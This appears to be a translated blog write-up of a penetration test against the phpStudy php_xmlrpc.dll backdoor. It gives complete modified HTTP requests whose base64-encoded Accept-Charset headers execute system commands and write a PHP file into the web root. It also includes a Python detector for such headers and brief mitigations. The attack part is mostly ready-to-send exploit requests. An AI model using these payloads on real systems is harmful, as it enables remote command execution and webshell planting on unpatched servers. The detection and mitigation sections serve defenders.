A penetration test starting from the phpStudy backdoor

Overview of the problem

Affected versions:
Default path: C:\phpStudy\PHPTutorial\php\php-5.2.17\ext\

The backdoored file sits in the ext extension folder of each bundled PHP version:
phpStudy20180211: php5.4.45 and php5.2.17, php_xmlrpc.dll
phpStudy20161103: php5.4.45 and php5.2.17, php_xmlrpc.dll

Location of the backdoor:
image-20191104165448398.png

Note: open the php_xmlrpc.dll file with Notepad to see it.

Getshell

We use the Burp proxy to capture the request and exploit the backdoor...

Unmodified request headers

GET / HTTP/1.1
Host: 192.168.1.131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image-20191104170224539.png

After modification:

GET / HTTP/1.1
Host: 192.168.1.131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip,deflate                 # remove the space before "deflate"
Accept-charset:c3lzdGVtKCdpcGNvbmZpZycpOw==   # add this new header; its value must be base64-encoded
Accept-Language: zh-CN,zh;q=0.9
Connection: close

This executes a system command. The base64-encoded value is: c3lzdGVtKCdpcGNvbmZpZycpOw==
It decodes to: system('ipconfig');
image-20191104170721857.png

phpinfo

image-20191104170830577.png

Writing a one-line webshell using the file_put_contents() function (here the file written is a phpinfo page):
file_put_contents("C:\phpStudy\PHPTutorial\WWW\info.php","<?php phpinfo(); ?>");
image-20191104171240547.png

GET / HTTP/1.1
Host: 192.168.1.131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip,deflate
Accept-charset:ZmlsZV9wdXRfY29udGVudHMoIkM6XHBocFN0dWR5XFBIUFR1dG9yaWFsXFdXV1xpbmZvLnBocCIsIjw/cGhwIHBocGluZm8oKTsgPz4iKTs=
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image-20191104171403855.png
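Both modified requests above share the same shape: an Accept-Charset header whose value base64-decodes to PHP function calls, next to an Accept-Encoding value with no space after the comma. That shape is what a defender should screen captured requests for. The following Python is an added detection example, not part of the original post; the sample requests are constructed here and reuse the two encoded values shown above.

```python
import base64
import re

# PHP functions whose presence in a decoded header value is worth alerting on.
WATCHED_CALLS = ("system", "exec", "shell_exec", "passthru", "eval", "file_put_contents")
_CALL_RE = re.compile(r"\b([a-z_][a-z0-9_]*)\s*\(", re.IGNORECASE)

# Constructed sample traffic: a benign request, then the two modified requests from the write-up.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: 192.168.1.131\r\nAccept-Encoding: gzip, deflate\r\n"
    "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nConnection: close\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 192.168.1.131\r\nAccept-Encoding: gzip,deflate\r\n"
    "Accept-charset:c3lzdGVtKCdpcGNvbmZpZycpOw==\r\nConnection: close\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 192.168.1.131\r\nAccept-Encoding: gzip,deflate\r\n"
    "Accept-charset:ZmlsZV9wdXRfY29udGVudHMoIkM6XHBocFN0dWR5XFBIUFR1dG9yaWFsXFdXV1xpbmZvLnBocCIsIjw/cGhwIHBocGluZm8oKTsgPz4iKTs=\r\n"
    "Connection: close\r\n\r\n",
]


def parse_headers(raw_request: str) -> dict:
    """Map lower-cased header names to values for one raw HTTP/1.1 request."""
    headers = {}
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def decode_as_text(value: str):
    """Strict base64-decode; return the text only if it is printable ASCII."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # not valid base64, or the bytes are not ASCII
        return None
    return text if text and all(c.isprintable() or c in "\r\n\t" for c in text) else None


def inspect_request(raw_request: str) -> dict:
    """Flag a request whose Accept-Charset value decodes to watched PHP calls."""
    headers = parse_headers(raw_request)
    finding = {"suspicious": False, "decoded": None, "calls": [],
               "encoding_no_space": headers.get("accept-encoding") == "gzip,deflate"}
    decoded = decode_as_text(headers.get("accept-charset", ""))
    if decoded is None:
        return finding
    calls = [c.lower() for c in _CALL_RE.findall(decoded) if c.lower() in WATCHED_CALLS]
    finding.update(decoded=decoded, calls=calls, suspicious=bool(calls))
    return finding
```

Real Accept-Charset values such as utf-8 or iso-8859-1 fail strict base64 decoding and are never flagged, so the check can run on proxy or WAF logs with few false positives.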

Protective measures

1. Edit the php.ini configuration file and comment out the line that loads this extension
image-20191104171619733.png

2. Use the latest phpStudy release

Summary

To be continued...

Reference link

https://www.freebuf.com/articles/others-articles/215406.html

Permalink:

https://www.betao.cn/archives/phpstudy.html